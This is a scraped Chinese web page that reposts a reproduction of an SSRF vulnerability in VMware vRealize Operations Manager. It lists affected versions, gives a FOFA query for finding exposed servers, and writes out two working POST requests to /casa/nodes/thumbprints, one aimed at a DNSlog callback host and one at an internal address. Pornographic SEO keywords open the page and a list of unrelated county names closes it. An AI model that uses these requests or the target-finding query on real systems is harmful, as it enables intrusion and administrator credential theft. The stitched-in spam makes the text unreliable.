内射老阿姨1区2区3区4区_久久精品人人做人人爽电影蜜月_久久国产精品亚洲77777_99精品又大又爽又粗少妇毛片

VMwarevRealizeOperationsManagerSSRF漏洞的示例分析

這篇文章給大家介紹VMware vRealize Operations Manager SSRF漏洞的示例分析,內(nèi)容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。

我們擁有十余年網(wǎng)頁設(shè)計和網(wǎng)站建設(shè)經(jīng)驗,從網(wǎng)站策劃到網(wǎng)站制作,我們的網(wǎng)頁設(shè)計師為您提供的解決方案。為企業(yè)提供成都網(wǎng)站建設(shè)、網(wǎng)站建設(shè)、微信開發(fā)、微信小程序定制開發(fā)、移動網(wǎng)站建設(shè)HTML5建站、等業(yè)務(wù)。無論您有什么樣的網(wǎng)站設(shè)計或者設(shè)計方案要求,我們都將富于創(chuàng)造性的提供專業(yè)設(shè)計服務(wù)并滿足您的需求。

漏洞描述

vRealize Operations Manager API包含服務(wù)器端請求偽造??梢酝ㄟ^網(wǎng)絡(luò)訪問vRealize Operations Manager API的惡意攻擊者可以執(zhí)行服務(wù)器端請求偽造攻擊(SSRF),以竊取管理憑據(jù)。

漏洞影響

vRealize_operations_manager: 8.0.0, 8.0.1, 8.3.0, 8.1.0, 8.1.1, 8.2.0, 7.5.0

cloud_foundation: 4.x 3.x

vRealize_suite_lifecycle_manager: 8.x

漏洞復(fù)現(xiàn)

使用FOFA語句包含關(guān)鍵字查找FOFA語句(僅供學(xué)習(xí)參考,請勿非法利用)

title="vRealize Operations Manager"

VMware vRealize Operations Manager SSRF漏洞的示例分析

訪問登錄頁面如下

VMware vRealize Operations Manager SSRF漏洞的示例分析

發(fā)送請求包如下

POST /casa/nodes/thumbprints HTTP/1.1Host: 127.0.0.1Content-Type: application/json;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Content-Length: 24["tw9ao5.DNSlog.cn"]

VMware vRealize Operations Manager SSRF漏洞的示例分析

VMware vRealize Operations Manager SSRF漏洞的示例分析

POST /casa/nodes/thumbprints HTTP/1.1Host:127.0.0.1Content-Type: application/json;charset=UTF-8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Content-Length: 24["127.0.0.1:443/ui"]

VMware vRealize Operations Manager SSRF漏洞的示例分析

關(guān)于VMware vRealize Operations Manager SSRF漏洞的示例分析就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,可以學(xué)到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

網(wǎng)頁標(biāo)題:VMwarevRealizeOperationsManagerSSRF漏洞的示例分析
分享路徑:http://m.rwnh.cn/article38/ipjhpp.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供虛擬主機網(wǎng)站設(shè)計公司、網(wǎng)站改版、網(wǎng)站排名、動態(tài)網(wǎng)站微信公眾號

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都定制網(wǎng)站網(wǎng)頁設(shè)計
洞口县| 黄梅县| 江安县| 曲靖市| 合山市| 溧水县| 酉阳| 绥芬河市| 手机| 峨眉山市| 九江市| 和田市| 哈尔滨市| 古交市| 辽宁省| 桐柏县| 平南县| 桐城市| 永善县| 信宜市| 桐梓县| 仙居县| 梨树县| 湘乡市| 射洪县| 花垣县| 犍为县| 射洪县| 孟州市| 横山县| 班戈县| 亳州市| 北京市| 永春县| 日照市| 汽车| 石嘴山市| 买车| 镇雄县| 揭西县| 蒙山县|